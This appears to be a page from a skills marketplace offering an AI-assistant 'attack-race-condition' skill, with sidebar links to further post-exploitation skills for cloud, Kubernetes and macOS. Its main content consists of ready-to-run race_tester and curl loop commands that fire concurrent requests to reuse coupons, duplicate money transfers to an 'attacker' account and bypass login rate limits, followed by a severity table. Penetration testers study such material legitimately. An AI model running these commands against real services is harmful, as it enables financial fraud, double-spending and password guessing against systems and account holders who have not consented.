菜单
Race condition / TOCTOU testing — concurrent requests to exploit time-of-check-to-time-of-use flaws
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-race-condition |
| description | Race condition / TOCTOU testing — concurrent requests to exploit time-of-check-to-time-of-use flaws |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["race-condition","toctou","web","business-logic","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-362","CWE-367"] |
| chains_with | [] |
| prerequisites | [] |
| severity_boost | {} |
Exploit time-of-check-to-time-of-use (TOCTOU) vulnerabilities by sending concurrent requests that bypass server-side validation.
State-changing operations vulnerable to race conditions:
# Basic race test — 20 concurrent POST requests
attack_script race_tester "https://TARGET/api/redeem" \
-m POST \
-H "Authorization:Bearer TOKEN" \
-d '{"coupon":"DISCOUNT50"}' \
-c 20 \
--json-output
# With delay (staggered)
attack_script race_tester "https://TARGET/api/transfer" \
-m POST \
-H "Authorization:Bearer TOKEN" \
-d '{"to":"attacker","amount":100}' \
-c 50 \
--delay 5
For critical timing, send all requests in a single TCP packet:
# Using curl with parallel connections
for i in $(seq 1 20); do
curl -s -X POST https://TARGET/api/redeem \
-H "Authorization: Bearer TOKEN" \
-d '{"coupon":"DISCOUNT50"}' &
done
wait
Look for:
# Race on rate-limited endpoint
attack_script race_tester "https://TARGET/api/login" \
-m POST \
-d '{"email":"victim@test.com","password":"guess1"}' \
-c 30
# Race on one-time action
attack_script race_tester "https://TARGET/api/claim-bonus" \
-m POST \
-H "Authorization:Bearer TOKEN" \
-c 20
| Finding | Severity |
|---|---|
| Financial: double-spend, duplicate transfer | Critical (P1) |
| Coupon/code reused multiple times | High (P2) |
| Rate limit bypassed via race | Medium (P3) |
| Duplicate record creation | Medium (P3) |
| Vote/like manipulation | Low (P4) |
attack_script race_tester — async concurrent request sender